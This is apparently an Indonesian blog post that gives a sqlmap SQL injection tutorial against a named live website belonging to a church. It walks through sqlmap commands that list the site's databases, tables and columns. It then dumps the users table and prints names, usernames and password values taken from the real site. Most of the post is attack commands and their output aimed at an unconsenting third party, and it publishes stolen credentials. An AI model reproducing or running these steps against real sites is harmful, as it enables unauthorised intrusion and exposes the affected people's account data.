Senin, 16 April 2012

SQL Map tutorial (LIVE Target)

kl ane pake Blackbuntu...
buka aja langsung..
Application >> Pentest >> Vulnerability Identification >> All >> SQL Map..
oke kl dah di buka kita mulai ..target kita adalah 
http://fpchurch.org.uk/News/view.php?id=26
Silahkan di cek..
.kasih aja single-quot "`"
lansung command pertama.
.====
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" --dbs
====
penjelasan :
-o untuk mengoptimasi kerja sqlmap
--url adalah target URL yang akan dieksploitasi
--dbs adalah untuk memunculkan nama database yang ada
Hasil dr command yang menunjukan jumlah databasenya :
====
available databases [2]:
[*] fpchurch
[*] information_schema
====
SS : sini


setelah itu kita lihat isi dari databasenya :
=====
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" -D fpchurch --tables
=====
penjelasan :
-D adalah nama database yang akan dienumerasi
--tables adalah opsi untuk menampilkan table pada database yang tadi sudah kita tentukan 
hasilnya keluar :
======
Database: 
fpchurch [47 tables]
.......................
biblebook..............
sermonseries
users
=======
*Sebenarnya itu menunjukan ada 47 tabel dalam databasenya,tapi karena terlalu panjang maka ane ambil database yg penting2 aja..
Tips : carilah username dan pass di letak tabel yg sering ada (dlam kasus ini [ user ].
SS : sini


command selanjutnya unt mengetahui isi dar tabel itu yaitu columns nya adalah :
=====
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" -D fpchurch -T users --columns
=====
penjelasan :
--columns : mengetahui isi dari tabel itu 
dan inilah hasil dari command itu :
========

Database: fpchurch
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| name     | varchar(45) |
| password | varchar(45) |
| username | varchar(45) |
+----------+-------------+


==========
SS : sini
sekarang waktunya kita bongkar isi username dan passwordnya...
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" -D fpchurch -T users --dump
=======
penjelasan :
--dump : unt mengeluarkan isi dari columns 


====
dan inilah Hasil dr Dump columns tersebut :
===========
+------------------------+---------------+-----------+
| name                   | password      | username  |
+------------------------+---------------+-----------+
| James Macleod          | fp258FDhdLDG6 | fpchurch  |
| Aberdeen2              | Ab7D2fflvJ0mc | Aberdeen2 |
| Aberdeen Congregation  | AbSg/i/9.1E8M | Aberdeen  |
+------------------------+---------------+-----------+


=====================
SS : sini


REFERANSI : root-bt.co.cc

SQL Map tutorial (LIVE Target) Rating: 4.5 Diposkan Oleh: r007-

0 komentar:

Posting Komentar